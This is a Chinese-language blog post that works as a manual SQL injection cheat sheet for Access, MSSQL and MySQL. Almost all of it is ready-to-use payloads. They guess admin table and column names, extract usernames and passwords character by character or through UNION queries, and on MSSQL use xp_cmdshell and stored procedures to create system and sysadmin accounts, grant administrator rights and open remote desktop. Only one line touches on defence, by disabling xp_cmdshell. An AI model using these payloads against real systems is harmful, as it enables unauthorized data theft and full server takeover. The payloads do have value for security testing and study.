Access+Mssql+Mysql 手工注入基本流程

  • A+
所属分类:颓废's Blog
摘要

0x01 Access 注入: 判断表名:admin and (select count(*) from admin)>0 判断字段名:username,password admin_user admin_pwd and (select count(admin_user) from admin)>0 猜解值的长度:admin_user=5 admin_pwd=16 and (select len(admin_user) from admin)=4依次尝试 猜属性值: and (select left(admin_user,1) from admin)=’a’ 在’ ‘中依次尝试字母数字 and (select left(admin_user,2) from admin)=’ad’ and (select left(admin_user,3) from admin)=’adm’ 偏移注入 猜表名: and exists (select * from 你要猜得表名) 查看是否存在表名 (存在的情况下页面刷新正常,同理猜字段一样的 结果存在admin) 猜列名的字段名: and exists (select 你要猜的字段名 from 你已经才出来的表名) 查看是否存在字段名(结果存在username和password) order by n 直到返回不正常,那么返回的列数就是n-1。n用二分法取。 得出显位的数字 union select 1,2,3,4,5,…,n-1 from admin 用显位猜解出字段内容 union select 1,2,username,4,5,…,n-1 from admin 0x02 Mssql/sqlserver 注入:

0x01 Access 注入:

判断表名:admin and (select count(*) from admin)>0 判断字段名:username,password admin_user admin_pwd and (select count(admin_user) from admin)>0 猜解值的长度:admin_user=5 admin_pwd=16 and (select len(admin_user) from admin)=4依次尝试 猜属性值: and (select left(admin_user,1) from admin)='a' 在’ ‘中依次尝试字母数字 and (select left(admin_user,2) from admin)='ad' and (select left(admin_user,3) from admin)='adm'  偏移注入 猜表名:  and exists (select * from 你要猜得表名) 查看是否存在表名 (存在的情况下页面刷新正常,同理猜字段一样的 结果存在admin)  猜列名的字段名:  and exists (select 你要猜的字段名 from 你已经才出来的表名)  查看是否存在字段名(结果存在username和password) order by n 直到返回不正常,那么返回的列数就是n-1。n用二分法取。  得出显位的数字 union select 1,2,3,4,5,...,n-1 from admin   用显位猜解出字段内容 union select 1,2,username,4,5,...,n-1 from admin

0x02 Mssql/sqlserver 注入:

判断注入点: and 1=1 and 1=2 猜版本: and [email protected]@version 猜用户名: and 1=user 猜当前连接数据库:article and 1=db_name() 猜解其它数据库: and 1=(select name from master.dbo.sysdatabases where dbid=6) 猜第一个表名:’admin’ 因为列的当前数据库,所以 sysobjects=article.sys.sysobjects and (select top 1 name from sysobjects where xtype='u')>0 猜其他表名:’t_jiaozhu’ and (select top 1 name from sysobjects where xtype='u' and name not in('admin'))>0 猜字段:username,password and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0 猜值 and (select username from admin)>0 破解密码MD5或者更改密码MD5值   后续操作 sqlserver 存储扩展应用 建立系统用户: net user username pass /add 系统提权 net localgroup administrators username /add 打开3389 reg add "hklm/System/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f 建立数据库用户: ;exec master..sp_addlogin user,pass;-- 数据库提权: ;exec master..sp_addsrvrolemember aa,sysadmin;-- xp_cmdshell应用 建立系统用户 ;exec master..xp_cmdshell "net user bb bb /add"-- 防止xp_cmdshell: ;exec master..sp_dropextendedproc 'xp_cmdshell' 恢复xp_cmdshell ;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll' 彻底防溢出 c:/windows/system32/cmd.exe 删除所有默认权限. 添加administrator–完全控制

0x03 Mysql 注入:

猜解字段数 order by 3%23  union select 1,2,3%23 获取当前数据库名 union select 1,(select database()) ,3%23 security 获取所有数据库名 union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23 information_schema,challenges,mysql,performance_schema,security 获取表名 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)%23 emails,referers,uagents,users 获取列名 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)%23 id,username,password 获取数据 union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23 获取数据库版本 union select 1,@@version,database()%23

作者:zerokeeper

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: